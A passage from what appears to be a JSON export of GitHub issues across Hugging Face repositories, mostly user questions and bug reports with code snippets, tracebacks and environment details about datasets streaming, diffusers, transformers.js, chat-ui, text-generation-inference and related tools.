I saved the step my training stopped at.\r\nBut how can I resume download from step 1_000_\u00b4000 without re-streaming all the first 1 million docs of the dataset?\r\n\r\n`download_config=DownloadConfig(resume_download=True)` seems to not work with streaming=True.\n\n### Steps to reproduce the bug\n\n```\r\nfrom datasets import load_dataset, DownloadConfig\r\ndataset = load_dataset(\r\n \"oscar-corpus/OSCAR-2201\",\r\n token=True,\r\n language=\"fr\",\r\n streaming=True, # optional\r\n split=\"train\",\r\n download_config=DownloadConfig(resume_download=True)\r\n)\r\n# interupt the run and try to relaunch it => this restart from scratch\r\n```\n\n### Expected behavior\n\nI would expect a parameter to start streaming from a given index in the dataset.\n\n### Environment info\n\n- `datasets` version: 2.14.0\r\n- Platform: Linux-5.19.0-45-generic-x86_64-with-glibc2.29\r\n- Python version: 3.8.10\r\n- Huggingface_hub version: 0.15.1\r\n- PyArrow version: 12.0.1\r\n- Pandas version: 2.0.0", "url": "https://github.com/huggingface/datasets/issues/6078", "state": "closed", "labels": [], "created_at": "2023-07-26T14:08:22Z", "updated_at": "2023-07-28T11:05:03Z", "comments": 3, "user": "NicolasMICAUX" }, { "repo": "huggingface/diffusers", "number": 4281, "title": "how o convert trained LoRA bin format file to A111 safetensor format", "body": "### Describe the bug\r\n\r\nI find script convert_lora_safetensor_to_diffusers.py,but it seems like convert safetensors to bin,not bin to safetensors,I try run this script,error like this:\r\n\u256d\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 Traceback (most recent call last) \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u256e\r\n\u2502 C:\\Users\\fut\\Desktop\\tinaniu\\convert_lora_safetensor_to_diffusers.py:125 in \u2502\r\n\u2502 \u2502\r\n\u2502 122 \u2502 lora_prefix_text_encoder = args.lora_prefix_text_encoder \u2502\r\n\u2502 123 \u2502 alpha = args.alpha \u2502\r\n\u2502 124 \u2502 \u2502\r\n\u2502 \u2771 125 \u2502 pipe = convert(base_model_path, checkpoint_path, lora_prefix_unet, lora_prefix_text_ \u2502\r\n\u2502 126 \u2502 \u2502\r\n\u2502 127 \u2502 pipe = pipe.to(args.device) \u2502\r\n\u2502 128 \u2502 pipe.save_pretrained(args.dump_path, safe_serialization=args.to_safetensors) \u2502\r\n\u2502 \u2502\r\n\u2502 C:\\Users\\fut\\Desktop\\tinaniu\\convert_lora_safetensor_to_diffusers.py:31 in convert \u2502\r\n\u2502 \u2502\r\n\u2502 28 \u2502 pipeline = StableDiffusionPipeline.from_pretrained(base_model_path, torch_dtype=torc \u2502\r\n\u2502 29 \u2502 \u2502\r\n\u2502 30 \u2502 # load LoRA weight from .safetensors \u2502\r\n\u2502 \u2771 31 \u2502 state_dict = load_file(checkpoint_path) \u2502\r\n\u2502 32 \u2502 \u2502\r\n\u2502 33 \u2502 visited = [] \u2502\r\n\u2502 34 \u2502\r\n\u2502 \u2502\r\n\u2502 D:\\anaconda3\\lib\\site-packages\\safetensors\\torch.py:259 in load_file \u2502\r\n\u2502 \u2502\r\n\u2502 256 \u2502 ``` \u2502\r\n\u2502 257 \u2502 \"\"\" \u2502\r\n\u2502 258 \u2502 result = {} \u2502\r\n\u2502 \u2771 259 \u2502 with safe_open(filename, framework=\"pt\", device=device) as f: \u2502\r\n\u2502 260 \u2502 \u2502 for k in f.keys(): \u2502\r\n\u2502 261 \u2502 \u2502 \u2502 result[k] = f.get_tensor(k) \u2502\r\n\u2502 262 \u2502 return result 
\u2502\r\n\r\nSafetensorError: Error while deserializing header: HeaderTooLarge\r\n\r\n\r\n### Reproduction\r\n\r\nSafetensorError: Error while deserializing header: HeaderTooLarge\r\n\r\n### Logs\r\n\r\n_No response_\r\n\r\n### System Info\r\n\r\ndiffusers==0.18.2\r\n\r\n### Who can help?\r\n\r\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/4281", "state": "closed", "labels": [ "bug", "stale" ], "created_at": "2023-07-26T08:16:48Z", "updated_at": "2023-09-04T15:03:46Z", "user": "futureflsl" }, { "repo": "huggingface/llm-vscode", "number": 50, "title": "The VSIX doesn't work; how can I fix it?", "body": "I downloaded the VSIX from https://marketplace.visualstudio.com/items?itemName=HuggingFace.huggingface-vscode&ssr=false#version-history, but when I installed it in VS Code it doesn't work. Could you fix this?", "url": "https://github.com/huggingface/llm-vscode/issues/50", "state": "closed", "labels": [], "created_at": "2023-07-26T07:05:17Z", "updated_at": "2023-10-17T14:34:58Z", "user": "CuteBadEgg" }, { "repo": "huggingface/transformers.js", "number": 216, "title": "[Question] Getting a lot of ERR 404s when running in browser.", "body": "When I use code that accesses bart-large-mnli in the front end of my app, the browser console shows that every attempt to use the pipeline fails with a 404 error (at least, that is what I think it's telling me).\r\n\r\nSo I am trying to use bart-large-mnli to analyze a bunch of 'post' objects, and only display them if the text in the post relates to a selected 'interest'.
\r\n\r\nHere is my javascript code to do that (checkRelevance.js):\r\n```\r\nimport { pipeline } from \"@xenova/transformers\";\r\n\r\nexport default async function checkTweet(text, interest) {\r\n try {\r\n console.log(\r\n `checking tweet...\\ntext:${text.substring(\r\n 0,\r\n 10\r\n )}...\\ninterest:${interest}`\r\n );\r\n let pipe = await pipeline(\r\n \"zero-shot-classification\",\r\n \"Xenova/bart-large-mnli\",\r\n { quantized: false }\r\n );\r\n // console.log(\"await out...\");\r\n let out = await pipe(text, interest);\r\n console.log(out);\r\n\r\n const relevant = out.scores[0] >= 0.5;\r\n console.log(out.scores[0]);\r\n return relevant;\r\n } catch (error) {\r\n console.log(error);\r\n }\r\n}\r\n```\r\nAnd here is how it is implemented in the front end Feed.jsx:\r\n\r\n```\r\nuseEffect(() => {\r\n setFilteredPosts(posts.map(post => {\r\n checkTweet(post.text, selectedInterest).then(result => {\r\n if (result) {\r\n return post\r\n }\r\n }\r\n )\r\n }))\r\n }, [selectedInterest]);\r\n\r\n// ...\r\n\r\nfilteredPosts.map((post) => (\r\n ) \r\n\r\n```\r\n\r\nNow when I run checkRelevance.js on it's own with a small test, it accesses the api just fine, but when it's implemented in the browser I get this:\r\n\"Screen\r\n\r\nand then this:\r\n\"Screen\r\n\r\nI'm not asking you to debug all my code lol, just wondering if there's something extra that needs doing for running it in the browser. If you need to see more lmk. Thanks!\r\n", "url": "https://github.com/huggingface/transformers.js/issues/216", "state": "closed", "labels": [ "question" ], "created_at": "2023-07-26T00:42:20Z", "updated_at": "2023-08-20T23:43:04Z", "user": "eklavyaisabird" }, { "repo": "huggingface/transformers.js", "number": 215, "title": "[Question] How to use a sharp buffer as input to \"image-classification\" pipeline ?", "body": "hi,\r\ni am looking to use a sharp buffer as an input to \"image-classification\" pipeline, it seems that only url can be provided as an input, i am using the model in nodejs environment (backend) , can anyone provide a solution to this.\r\n\r\nthanks\r\n", "url": "https://github.com/huggingface/transformers.js/issues/215", "state": "closed", "labels": [ "question" ], "created_at": "2023-07-25T21:10:06Z", "updated_at": "2023-07-25T21:42:18Z", "user": "geminigeek" }, { "repo": "huggingface/chat-ui", "number": 368, "title": "Ability to pass in request headers for model endpoints", "body": "Hello.\r\n\r\nI am trying to add an AWS Sagemaker model endpoint to chat-ui and I am getting stuck on the authorization part because I can't pass in request headers to the endpoint. I am able to pass in the authorization string but then I get the following error:\r\n\r\n```\r\nCould not parse last message {\"message\":\"Authorization header requires existence of either a 'X-Amz-Date' or a 'Date' header. 
Authorization=AWS4-HMAC-SHA256 Credential=, Signature=\"}\r\nSyntaxError: Unexpected end of JSON input\r\n at JSON.parse ()\r\n at parseGeneratedText (/src/routes/conversation/[id]/+server.ts:196:32)\r\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5)\r\n at async saveMessage (/src/routes/conversation/[id]/+server.ts:107:26)\r\n```\r\n\r\nIs it possible to add the ability to pass in headers to the model endpoints in the `.env.local` file?", "url": "https://github.com/huggingface/chat-ui/issues/368", "state": "closed", "labels": [], "created_at": "2023-07-25T20:12:28Z", "updated_at": "2023-08-18T15:26:41Z", "comments": 3, "user": "lotif" }, { "repo": "huggingface/autotrain-advanced", "number": 161, "title": "How to save every X steps on cli?", "body": "You could set --save_strategy steps, but how do you specify the number of steps so that the model is saved every X steps?\r\n\r\nMy command:\r\n```\r\nautotrain llm --train --project_name project --model ./llama/llama_models/7B-hf --data_path . --use_peft --use_int4 --learning_rate 2e-4 --train_batch_size 12 --num_train_epochs 1 --trainer sft --save_strategy steps --save_total_limit 1\r\n```", "url": "https://github.com/huggingface/autotrain-advanced/issues/161", "state": "closed", "labels": [], "created_at": "2023-07-25T16:10:22Z", "updated_at": "2023-12-18T15:29:08Z", "user": "astarostap" }, { "repo": "huggingface/setfit", "number": 400, "title": "From which number of training samples does it not make sense anymore to use SetFit?", "body": "I'm building a classifier that assigns news articles to one of 8 categories, I was wondering if there was a rule of thumb that over a certain number of training samples per class it would make more sense to use a traditional transformer classifier such as roberta-large? Or will SetFit always be more accurate?\r\n\r\n\r\n ", "url": "https://github.com/huggingface/setfit/issues/400", "state": "open", "labels": [ "question" ], "created_at": "2023-07-25T06:56:04Z", "updated_at": "2023-08-01T14:13:48Z", "user": "lbelpaire" }, { "repo": "huggingface/diffusers", "number": 4234, "title": "How to train instruct-pix2pix with controlnet and inference", "body": "Hi guys,\r\nI want to train instruct-pix2pix using controlnet condition. As you know, currently available for [instruct-pix2pix](https://huggingface.co/docs/diffusers/training/instructpix2pix) and [control net](https://huggingface.co/docs/diffusers/training/controlnet) separately. \r\n**Q1)** Have you plan about this problem for implementation?\r\n**Q2)** How I can merge them and add controlnet into instruct-pix2pix?\r\n**Q3)** Suppose this issue is done, I want to do start training, In your opinion, If we use controlnet pretraining network, and freeze that network and I want to train only instruct-pix2pix model, Is it common way to do?", "url": "https://github.com/huggingface/diffusers/issues/4234", "state": "closed", "labels": [ "stale" ], "created_at": "2023-07-24T13:47:02Z", "updated_at": "2023-08-31T15:04:14Z", "user": "mzeynali" }, { "repo": "huggingface/chat-ui", "number": 366, "title": "v0.4.0 Not on GitHub", "body": "The hosted version is already at v0.4.0. This is at least not reflected in the tags or releases here. 
Is there other non public code?", "url": "https://github.com/huggingface/chat-ui/issues/366", "state": "closed", "labels": [], "created_at": "2023-07-24T11:35:38Z", "updated_at": "2023-07-24T13:19:30Z", "comments": 2, "user": "claell" }, { "repo": "huggingface/chat-ui", "number": 364, "title": "Facing Error 403 after deployment", "body": "Hi folks!\r\nMy Chat-UI setup along with a custom LangChain model works perfect on localhost. I tried to deploy it on an Azure VM with Docker Containers and I have been facing this issue which might be due to MongoDB.\r\n\r\n![image](https://github.com/huggingface/chat-ui/assets/39643649/82b75337-7e99-4347-82ab-1ab4a1a38f93)\r\n\r\n Any help is appreciated. Thank you", "url": "https://github.com/huggingface/chat-ui/issues/364", "state": "closed", "labels": [ "back", "support" ], "created_at": "2023-07-24T10:57:53Z", "updated_at": "2024-04-25T16:29:38Z", "comments": 13, "user": "awsum0225" }, { "repo": "huggingface/chat-ui", "number": 363, "title": "When starting with build files, it becomes impossible to change the model.", "body": "When starting with pm2 following the Docker file's instructions, I encounter an issue where I cannot change the model. Specifically, after clicking on \"Current Model,\" a popup to select the model appears, but even after selecting \"Apply,\" no changes are observed. Upon inspecting the developer tools, I noticed a 403 Error for http://localhost:3000/settings. This problem occurs both when hosting the software on a Docker container and when deploying it directly.\r\n![image](https://github.com/huggingface/chat-ui/assets/7141702/ed16edd1-ebe5-4b1f-b47e-c6be1c380ccf)\r\n\r\nAlso, I have confirmed that this error does not occur when using `npm run dev` or `npm run preview`. Therefore, I suspect that this issue may be related to pm2. If someone has any hints or insights that could help resolve this problem, I would greatly appreciate comments.\r\n\r\nMy environment is as follows:\r\nOS: Windows 10 + WSL 2 (Ubuntu 20.04)\r\nNode Version: 18.15.0\r\nCommit ID: 569bde33470b075bf1365af2cb03a1b31b875379\r\n", "url": "https://github.com/huggingface/chat-ui/issues/363", "state": "closed", "labels": [ "bug", "support" ], "created_at": "2023-07-24T08:30:03Z", "updated_at": "2023-10-16T16:07:25Z", "comments": 4, "user": "suzuki-shm" }, { "repo": "huggingface/diffusers", "number": 4222, "title": "How to train ldm on a low-resolution image dataset (128*128)", "body": "**Is your feature request related to a problem? Please describe.**\r\nA clear and concise description of what the problem is. Ex. 
I'm always frustrated when [...]\r\n\r\n**Describe the solution you'd like**\r\nA clear and concise description of what you want to happen.\r\n\r\n**Describe alternatives you've considered**\r\nA clear and concise description of any alternative solutions or features you've considered.\r\n\r\n**Additional context**\r\nAdd any other context or screenshots about the feature request here.\r\n", "url": "https://github.com/huggingface/diffusers/issues/4222", "state": "closed", "labels": [ "stale" ], "created_at": "2023-07-24T03:14:20Z", "updated_at": "2023-08-31T15:04:25Z", "user": "crowningwang" }, { "repo": "huggingface/text-generation-inference", "number": 679, "title": "How to load a model from a given path?", "body": "### System Info\n\ntgi version:0.9.0\n\n### Information\n\n- [X] Docker\n- [ ] The CLI directly\n\n### Tasks\n\n- [ ] An officially supported command\n- [ ] My own modifications\n\n### Reproduction\n\nI just want to use tgi to run llama-7b model to get the throughput on A100. The model files are preloaded in a given path. I followed the readme and found the following error. \r\n\r\n**Is theres any option for load model from a path?** Thanks~\r\n\r\n```shell\r\nme@ubuntu20-02:~/zy$ docker run --gpus all --shm-size 1g -p 8080:80 -v ~/w/data:/data ghcr.io/huggingface/text-generation-inference:0.9.2 --model-id /shared/models/huggingface/llama-7B-hf/ \r\n2023-07-23T14:17:02.797888Z INFO text_generation_launcher: Args { model_id: \"/shared/models/huggingface/LLM/llama-7B-hf/\", revision: None, validation_workers: 2, sharded: None, num_shard: None, quantize: None, dtype: None, trust_remote_code: false, max_concurrent_requests: 128, max_best_of: 2, max_stop_sequences: 4, max_input_length: 1024, max_total_tokens: 2048, waiting_served_ratio: 1.2, max_batch_prefill_tokens: 4096, max_batch_total_tokens: 16000, max_waiting_tokens: 20, hostname: \"1401cbf60306\", port: 80, shard_uds_path: \"/tmp/text-generation-server\", master_addr: \"localhost\", master_port: 29500, huggingface_hub_cache: Some(\"/data\"), weights_cache_override: None, disable_custom_kernels: false, json_output: false, otlp_endpoint: None, cors_allow_origin: [], watermark_gamma: None, watermark_delta: None, ngrok: false, ngrok_authtoken: None, ngrok_domain: None, ngrok_username: None, ngrok_password: None, env: false }\r\n2023-07-23T14:17:02.798147Z INFO text_generation_launcher: Starting download process.\r\n2023-07-23T14:17:08.906356Z ERROR text_generation_launcher: Download encountered an error: Traceback (most recent call last):\r\n\r\n File \"/opt/conda/bin/text-generation-server\", line 8, in \r\n sys.exit(app())\r\n\r\n File \"/opt/conda/lib/python3.9/site-packages/text_generation_server/cli.py\", line 109, in download_weights\r\n utils.weight_files(model_id, revision, extension)\r\n\r\n File \"/opt/conda/lib/python3.9/site-packages/text_generation_server/utils/hub.py\", line 96, in weight_files\r\n filenames = weight_hub_files(model_id, revision, extension)\r\n\r\n File \"/opt/conda/lib/python3.9/site-packages/text_generation_server/utils/hub.py\", line 25, in weight_hub_files\r\n info = api.model_info(model_id, revision=revision)\r\n\r\n File \"/opt/conda/lib/python3.9/site-packages/huggingface_hub/utils/_validators.py\", line 112, in _inner_fn\r\n validate_repo_id(arg_value)\r\n\r\n File \"/opt/conda/lib/python3.9/site-packages/huggingface_hub/utils/_validators.py\", line 160, in validate_repo_id\r\n raise HFValidationError(\r\n\r\nhuggingface_hub.utils._validators.HFValidationError: Repo id must be in the form 
'repo_name' or 'namespace/repo_name': '/bigdata/shared/models/huggingface/LLM/llama-7B-hf/'. Use `repo_type` argument if needed.\r\n\r\n\r\nError: DownloadError\r\n```\n\n### Expected behavior\n\noutput the running log.", "url": "https://github.com/huggingface/text-generation-inference/issues/679", "state": "closed", "labels": [], "created_at": "2023-07-23T06:35:16Z", "updated_at": "2023-07-24T01:34:10Z", "user": "zhaoyang-star" }, { "repo": "huggingface/controlnet_aux", "number": 67, "title": "Please I want to know how to install", "body": "Hello, I am new to this and I want to know how to install this particular package. I have installed other packages, but this one I do not know how. Please help with this.\r\n", "url": "https://github.com/huggingface/controlnet_aux/issues/67", "state": "open", "labels": [], "created_at": "2023-07-22T18:57:33Z", "updated_at": "2023-07-26T01:03:21Z", "user": "sohaib19922" }, { "repo": "huggingface/diffusers", "number": 4210, "title": "How to use \"attention_mask\" in \"forward\" function of \"UNet2DConditionModel\" defined in \"diffusers/src/diffusers/models /unet_2d_condition.py\"?", "body": "### Describe the bug\n\nHow to use the \"attention_mask\" in UNet2DConditionModel? What should the size of \"attention_mask\" look like? \r\n\r\nAnd \"attention_mask\" can not be used when opening \"enable_xformers_memory_efficient_attention\" in \"examples/text_to_image/train_text_to_image.py\"? \r\n\r\n` File \"/usr/local/lib/python3.9/dist-packages/diffusers/models/unet_2d_blocks.py\", line 970, in custom_forward\r\n return module(*inputs, return_dict=return_dict)\r\n File \"/usr/local/lib/python3.9/dist-packages/torch/nn/modules/module.py\", line 1501, in _call_impl\r\n return forward_call(*args, **kwargs)\r\n File \"/usr/local/lib/python3.9/dist-packages/diffusers/models/transformer_2d.py\", line 291, in forward\r\n hidden_states = block(\r\n File \"/usr/local/lib/python3.9/dist-packages/torch/nn/modules/module.py\", line 1501, in _call_impl\r\n return forward_call(*args, **kwargs)\r\n File \"/usr/local/lib/python3.9/dist-packages/diffusers/models/attention.py\", line 154, in forward\r\n attn_output = self.attn1(\r\n File \"/usr/local/lib/python3.9/dist-packages/torch/nn/modules/module.py\", line 1501, in _call_impl\r\n return forward_call(*args, **kwargs)\r\n File \"/usr/local/lib/python3.9/dist-packages/diffusers/models/attention_processor.py\", line 321, in forward\r\n return self.processor(\r\n File \"/usr/local/lib/python3.9/dist-packages/diffusers/models/attention_processor.py\", line 1027, in __call__\r\n attention_mask = attention_mask.expand(-1, query_tokens, -1)\r\n\r\nRuntimeError: expand(torch.cuda.HalfTensor{[80, 1, 6144, 6144]}, size=[-1, 6144, -1]): the number of sizes provided (3) must be greater or equal to the number of dimensions in the tensor (4)`\n\n### Reproduction\n\nNone\n\n### Logs\n\n_No response_\n\n### System Info\n\n- `diffusers` version: 0.19.0.dev0\r\n- Platform: Linux-5.4.143.bsk.7-amd64-x86_64-with-glibc2.31\r\n- Python version: 3.9.2\r\n- PyTorch version (GPU?): 2.0.1+cu117 (True)\r\n- Huggingface_hub version: 0.16.4\r\n- Transformers version: 4.30.2\r\n- Accelerate version: 0.21.0\r\n- xFormers version: 0.0.20\r\n- Using GPU in script?: \r\n- Using distributed or parallel set-up in script?: \n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/4210", "state": "closed", "labels": [ "bug", "stale" ], "created_at": "2023-07-22T17:28:56Z", "updated_at": "2024-10-18T16:34:37Z", "user": 
"ZihaoW123" }, { "repo": "huggingface/accelerate", "number": 1758, "title": "How to use c10 backend for fault tolerance", "body": "Hi,\r\n\r\nI found little to no documentation on how to use c10 backend for fault tolerance with accelerate. PyTorch seems to be having this:\r\nhttps://pytorch.org/docs/stable/elastic/rendezvous.html\r\n\r\nI am looking for fault tolerance in case of crash in few nodes, which also means adjusting batch size dynamically to account for nodes that are down.\r\n\r\nThanks in advance.", "url": "https://github.com/huggingface/accelerate/issues/1758", "state": "closed", "labels": [], "created_at": "2023-07-22T08:26:33Z", "updated_at": "2023-08-29T15:06:00Z", "user": "geekyGoku" }, { "repo": "huggingface/autotrain-advanced", "number": 155, "title": "How to do inference via autotrain-advanced?", "body": "I see an option to do inference autotrain llm --help. \r\n1. Can you share command to do inference on say llama2 model ? How do you pass lora files to do inference?\r\n2. Any option to do merge and unload while saving the model locally?\r\n3. Any option for multi-gpu training with single node - specify local rank?", "url": "https://github.com/huggingface/autotrain-advanced/issues/155", "state": "closed", "labels": [], "created_at": "2023-07-22T05:55:25Z", "updated_at": "2023-12-15T00:14:28Z", "user": "sujithjoseph" }, { "repo": "huggingface/transformers.js", "number": 206, "title": "[Question] Output always equal to Input in text-generation", "body": "I tried a different types of input and always get the output equals the input... What I'm missing?\r\n\r\n```\r\nconst answerer = await pipeline('text-generation', 'Xenova/LaMini-Cerebras-590M');\r\n\r\nlet zica = await answerer(`Based on this history:\r\nAndr\u00e9 de Mattos Ferraz is an engineering manager in Rio de Janeiro, Brazil. He has worked in systems development in the oil sector, working in several areas of the oil/gas life cycle: Exploration, Reservoir, and Production. He also worked on data science projects for predicting failures of water injection pumps, forecasting water filter saturation (SRU), and analyzing vibrations.\r\n\r\nWhat are Andr\u00e9 tech skills?`);\r\nconsole.log(zica)\r\n```\r\n\r\n![image](https://github.com/xenova/transformers.js/assets/139378356/f35b3c9a-fdcc-4258-ac0d-0a2e8de83877)\r\n", "url": "https://github.com/huggingface/transformers.js/issues/206", "state": "closed", "labels": [ "question" ], "created_at": "2023-07-21T21:18:02Z", "updated_at": "2023-07-22T02:21:05Z", "user": "AndreEneva" }, { "repo": "huggingface/transformers.js", "number": 205, "title": "[Question] Is transformers.js expected to work with react native?", "body": "I've naively been trying to run the transformers js library via react native on android.\r\nNote that onnxruntime-react-native explicitly supports react native, however the transformers.js package depends only on onnxruntime-web and onnruntime-node.\r\nImporting the transformers.js works fine, however as I try to load a model, I receive the error `import.meta` is currently unsupported from `transformers.js`.\r\n\r\nIt would be super convenient to be able to use pipes directly without needing to interface without onnxruntine-react-native directly! 
If not supported yet, what would need to be done?", "url": "https://github.com/huggingface/transformers.js/issues/205", "state": "closed", "labels": [ "question" ], "created_at": "2023-07-21T20:55:44Z", "updated_at": "2023-07-21T21:35:35Z", "user": "Wehzie" }, { "repo": "huggingface/setfit", "number": 398, "title": "hyperparameters to control how to handle long documents", "body": "It's common that one might want to use setfit for classifying documents that are longer than max_token_len.\r\n\r\nThere are several strategies for handling long documents, and the efficacy of each is data dependent:\r\n* Break the document up at max_token_length, possibly avoiding breaking word boundaries.\r\n* Optionally using a sliding window.\r\n* Keeping all the windows, or the first k-windows, or something fancier like finding the most \"interesting\" windows with respect to the overall corpus.\r\n\r\nThen after embedding each window, different classification strategies are possible:\r\n* maxpool then predict\r\n* average then predict\r\n* predict then average\r\n\r\nIt would be great if these could approaches could be hyperparameters for validation + test.\r\n\r\nFor train, it might be easiest to insist the training max_token_len is in bounds, alternately the above strategies could be used too.\r\n\r\nRelated:\r\nhttps://github.com/UKPLab/sentence-transformers/issues/1673\r\nhttps://github.com/UKPLab/sentence-transformers/issues/1333\r\nhttps://github.com/UKPLab/sentence-transformers/issues/1166", "url": "https://github.com/huggingface/setfit/issues/398", "state": "open", "labels": [], "created_at": "2023-07-21T11:53:13Z", "updated_at": "2023-07-21T11:53:13Z", "user": "turian" }, { "repo": "huggingface/text-generation-inference", "number": 672, "title": "What is optimal max batch size max sequence length (max_total_tokens) for running llama 2 70b chat on 4 A100 80GB?", "body": "This is what i have in my current config \r\nvalidation_workers: 2, max_total_tokens: 4096, waiting_served_ratio: 1.2, max_batch_prefill_tokens: 4096, max_batch_total_tokens: None, max_waiting_tokens: 20\r\n\r\nWhat do you recommend I should use to get the most out of inference for this setup? ", "url": "https://github.com/huggingface/text-generation-inference/issues/672", "state": "closed", "labels": [], "created_at": "2023-07-21T11:17:49Z", "updated_at": "2023-07-21T12:45:31Z", "user": "yakotoka" }, { "repo": "huggingface/datasets", "number": 6057, "title": "Why is the speed difference of gen example so big?", "body": "```python\r\ndef _generate_examples(self, metadata_path, images_dir, conditioning_images_dir):\r\n with open(metadata_path, 'r') as file:\r\n metadata = json.load(file)\r\n\r\n for idx, item in enumerate(metadata):\r\n image_path = item.get('image_path')\r\n text_content = item.get('text_content')\r\n image_data = open(image_path, \"rb\").read()\r\n yield idx, {\r\n \"text\": text_content,\r\n \"image\": {\r\n \"path\": image_path,\r\n \"bytes\": image_data,\r\n },\r\n \"conditioning_image\": {\r\n \"path\": image_path,\r\n \"bytes\": image_data,\r\n },\r\n }\r\n```\r\nHello, \r\n\r\nI use the above function to deal with my local data set, but I am very surprised that the speed at which I generate example is very different. When I start a training task, **sometimes 1000examples/s, sometimes only 10examples/s.**\r\n\r\n![image](https://github.com/huggingface/datasets/assets/46072190/cdc17661-8267-4fd8-b30c-b74d505efd9b)\r\n\r\nI'm not saying that speed is changing all the time. 
I mean, the reading speed is different in different training, which will cause me to start training over and over again until the speed of this generation of examples is normal.\r\n", "url": "https://github.com/huggingface/datasets/issues/6057", "state": "closed", "labels": [], "created_at": "2023-07-21T03:34:49Z", "updated_at": "2023-10-04T18:06:16Z", "comments": 1, "user": "pixeli99" }, { "repo": "huggingface/transformers.js", "number": 203, "title": "how to do embeddings?", "body": "I want to create an AI assistant for my personal website using Node.js. While I can easily create it using OpenAI embeddings, their API costs are prohibitively expensive. Therefore, I am looking for an alternative method and wondering how I can perform embeddings using a CSV file. Can you advise me on how to do this?\r\n\r\n\r\n```\r\n\r\nasync function getEmbeddings(tokens) {\r\n console.log(\"start getEmbeddings\");\r\n\r\n let response;\r\n try {\r\n console.log(\"initiating openai api call\");\r\n response = await openai.createEmbedding({\r\n model: \"text-embedding-ada-002\",\r\n input: tokens,\r\n });\r\n } catch (e) {\r\n console.error(\"Error calling OpenAI API getEmbeddings:\", e?.response?.data);\r\n throw new Error(\"Error calling OpenAI API getEmbeddings\");\r\n }\r\n\r\n return response.data.data;\r\n}\r\n```", "url": "https://github.com/huggingface/transformers.js/issues/203", "state": "closed", "labels": [ "question" ], "created_at": "2023-07-21T02:41:40Z", "updated_at": "2024-06-26T14:09:51Z", "user": "putuoka" }, { "repo": "huggingface/chat-ui", "number": 361, "title": "Configuration for Llama 2", "body": "I am trying to self host Llama 2 with https://github.com/huggingface/text-generation-inference and https://github.com/huggingface/chat-ui . If I give configuration for chat-ui like this:\r\n\r\n```\r\n {\r\n \"name\": \"llama2-7b-chat\",\r\n \"datasetName\": \"llama2-7b-chat\",\r\n \"description\": \"A good alternative to ChatGPT\",\r\n \"endpoints\": [{\"url\": \"http://127.0.0.1:8081/generate_stream\"}],\r\n \"userMessageToken\": \"<|prompter|>\",\r\n \"assistantMessageToken\": \"<|assistant|>\",\r\n \"messageEndToken\": \"\",\r\n \"preprompt\": \"Below are a series of dialogues between various people and an AI assistant. The AI tries to be helpful, polite, honest, sophisticated, emotionally aware, and humble-but-knowledgeable. The assistant is happy to help with almost anything, and will do its best to understand exactly what is needed. It also tries to avoid giving false or misleading information, and it caveats when it isn't entirely sure about the right answer. That said, the assistant is practical and really does its best, and doesn't let caution get too much in the way of being useful.\\n-----\\n\",\r\n \"promptExamples\": [\r\n {\r\n \"title\": \"Write an email from bullet list\",\r\n \"prompt\": \"As a restaurant owner, write a professional email to the supplier to get these products every week: \\n\\n- Wine (x10)\\n- Eggs (x24)\\n- Bread (x12)\"\r\n }, {\r\n \"title\": \"Code a snake game\",\r\n \"prompt\": \"Code a basic snake game in python, give explanations for each step.\"\r\n }, {\r\n \"title\": \"Assist in a task\",\r\n \"prompt\": \"How do I make a delicious lemon cheesecake?\"\r\n }\r\n ],\r\n \"parameters\": {\r\n \"temperature\": 0.8,\r\n \"top_p\": 0.95,\r\n \"repetition_penalty\": 1.8,\r\n \"top_k\": 10,\r\n \"truncate\": 1000,\r\n \"max_new_tokens\": 1024\r\n }\r\n }\r\n```\r\n\r\nIt will not return good response like https://huggingface.co/chat. 
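A hedged note on the configuration above: `<|prompter|>` and `<|assistant|>` are OpenAssistant-style tokens, whereas the Llama 2 chat models were trained on their own `[INST]`-based template, so a template mismatch by itself can explain poor responses. A minimal sketch of the expected single-turn format:

```python
def build_llama2_prompt(system_prompt: str, user_message: str) -> str:
    """Assemble a single-turn Llama 2 chat prompt.

    Llama 2 chat models expect [INST] ... [/INST] markers with an
    optional <<SYS>> block, not OpenAssistant-style role tokens.
    """
    return (
        "<s>[INST] <<SYS>>\n"
        f"{system_prompt}\n"
        "<</SYS>>\n\n"
        f"{user_message} [/INST]"
    )


print(build_llama2_prompt(
    "You are a helpful assistant.",
    "How do I make a delicious lemon cheesecake?",
))
```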
\r\n\r\n![chat-ui-with-llama2-7b](https://github.com/huggingface/chat-ui/assets/661860/7afd7d99-2737-45fb-96d3-b4adfcc6e2d5)\r\n\r\n\r\n\r\n", "url": "https://github.com/huggingface/chat-ui/issues/361", "state": "closed", "labels": [ "support", "models" ], "created_at": "2023-07-20T14:04:29Z", "updated_at": "2023-08-22T13:54:46Z", "comments": 3, "user": "aisensiy" }, { "repo": "huggingface/text-generation-inference", "number": 658, "title": "How to use AutoGPTQ model in tgi", "body": "\r\n![image](https://github.com/huggingface/text-generation-inference/assets/76865636/0d752006-a387-4b6d-99a2-d17d58e27549)\r\n\r\ncommand\uff1a\r\n\r\nexport GPTQ_BITS=4\r\nexport GPTQ_GROUPSIZE=128\r\n\r\ntext-generation-launcher --model-id Ziya-LLaMA-13B_4bit --disable-custom-kernels --port 6006 --revision gptq-4bit-128g-actorder_True --quantize gptq\r\n\r\nresult:\r\n\r\nTraceback (most recent call last):\r\n\r\n File \"/root/miniconda3/envs/text-generation-inference/bin/text-generation-server\", line 8, in \r\n sys.exit(app())\r\n\r\n File \"/root/autodl-tmp/text-generation-inference-main/server/text_generation_server/cli.py\", line 78, in serve\r\n server.serve(\r\n\r\n File \"/root/autodl-tmp/text-generation-inference-main/server/text_generation_server/server.py\", line 169, in serve\r\n asyncio.run(\r\n\r\n File \"/root/miniconda3/envs/text-generation-inference/lib/python3.9/asyncio/runners.py\", line 44, in run\r\n return loop.run_until_complete(main)\r\n\r\n File \"/root/miniconda3/envs/text-generation-inference/lib/python3.9/asyncio/base_events.py\", line 647, in 